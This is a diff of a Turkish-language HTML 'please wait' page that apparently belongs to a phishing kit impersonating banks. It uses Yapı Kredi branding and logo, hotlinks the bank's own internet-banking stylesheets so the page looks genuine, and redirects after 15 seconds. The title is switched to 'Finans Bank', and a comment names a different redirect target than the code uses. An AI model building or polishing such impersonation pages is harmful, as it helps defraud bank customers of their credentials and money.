--- a/bekle.html
+++ b/bekle.html
@@ -3,9 +3,9 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Yapı Kredi</title>
-    <link rel="stylesheet" href="https://www.yapikredi.com.tr//ngi-static/css/source/fonts.css">
-    <link rel="stylesheet" href="https://www.yapikredi.com.tr//ngi-static/css/main.ui.min.css">
+    <title>Finans Bank</title>
+    <link rel="stylesheet" href="https://internetsube.yapikredi.com.tr/ngi-static/css/source/fonts.css">
+    <link rel="stylesheet" href="https://internetsube.yapikredi.com.tr/ngi-static/css/main.ui.min.css">
     <link rel="stylesheet" href="main.css">
     <style>
         body {
@@ -14,19 +14,29 @@
             display: flex;
             justify-content: center;
             align-items: center;
+            background-color: #f5f5f5;  /* Arka plan rengi */
             font-family: Arial, sans-serif;
         }
+
         .container {
+            background-color: white; /* Beyaz arka plan */
+            padding: 40px;
+            border-radius: 10px;
+            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
             text-align: center;
             display: flex;
             flex-direction: column;
             justify-content: center;
             align-items: center;
+            max-width: 400px;
+            width: 100%;
         }
+
         .loading-message {
             font-size: 24px;
             margin-bottom: 20px;
         }
+
         .spinner {
             border: 8px solid #f3f3f3;
             border-top: 8px solid #3498db;
@@ -35,16 +45,22 @@
             height: 50px;
             animation: spin 2s linear infinite;
         }
+
         @keyframes spin {
             0% { transform: rotate(0deg); }
             100% { transform: rotate(360deg); }
+        }
+
+        .logo img {
+            max-width: 150px;
+            margin-bottom: 20px;
         }
     </style>
 </head>
 <body>
     <div class="container">
         <div class="logo">
-            <img src="./logo.png" alt="Yapı Kredi Logo">
+            <img src="bng1/logo.png" alt="Yapı Kredi Logo">
         </div>
         <div class="loading-message">Başvurunuz Oluşturuluyor Lütfen Bekleyiniz...</div>
         <div class="spinner"></div>
@@ -53,7 +69,7 @@
     <script>
         setTimeout(function() {
             window.location.href = "kosul.html";
-        }, 15000);
+        }, 15000);  // 15 saniye sonra onay.html sayfasına yönlendirilir
     </script>
 </body>
 </html>
